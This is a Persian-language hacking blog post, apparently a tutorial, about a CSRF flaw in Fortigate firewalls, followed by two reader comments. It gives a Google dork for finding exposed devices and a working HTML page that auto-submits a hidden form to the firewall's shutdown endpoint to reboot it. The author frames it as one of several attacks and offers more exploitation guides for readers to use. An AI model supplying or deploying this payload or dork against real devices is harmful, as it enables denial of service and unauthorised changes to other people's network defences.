آسیب پذیری CSRF در فایروال های Fortigate
باز هم آموزش های اختصاصی من این آسیب پذیری دو روز پیش توسط Sven Wurth رونمایی شده است ! توسط این اکسپلویت که از نوع CSRF می باشد ، هکر قادر به دور زدن فایروال در نسخه های 4.3.13 و 5.0.2 در تمامی فایروال های شرکت Fortigate می باشد . دلیل به وجود آمدن این باگ ، این است که بسیاری از فانکشن ها توسط CSRF-Tokens محافظت نشده و تحت شرایط خاصی امکان تغییر تنظیمات فایروال و یا معرفی شما به صورت مدیر وجود دارد
مواد مورد نیاز :
- هکر باید IP دستگاه را بداند
- مدیر باید توسط یک authenticated connection (ارتباط تایید شده) به دستگاه متصل باشد
Dork گوگل :
english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser-
مثالی از این آسیب پدیری ;
با استفاده از کد های زیر شما می توانید فایروال های Fortigate را reboot کنید :
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post">
<input type="hidden" name="reason" value="">
<input type="hidden" name="action" value="1">
<input type="submit" name="add" value="rebootme">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
* توجه داشته باشید که این فقط یکی از انواع حملات از طریق این آسیب پذیری بود
در صورت درخواست کاربران آموزش استفاده از آسیب پذیری های مختلف را آماده و به اشتراک می گذارم تا همه دوستان قادر به استفاده از آسیب پذیری هایی که ارسال می کنم باشند .
موفق و پیروز باشید
کلا مطالب رو از دفعه قبلی تا الان خوندم :دی امیدوارم باز دستتون بهتر بشه :دی
فقط یه اشتراکی چیزی بزارید آپ میکنید بیاد توی ایمیل -هر چند وقت یه بار سایتتون رو پیدا میکنم :-"
اگه این کار بشه من از باز دید کنندگان پرو پا قرص میشم :دی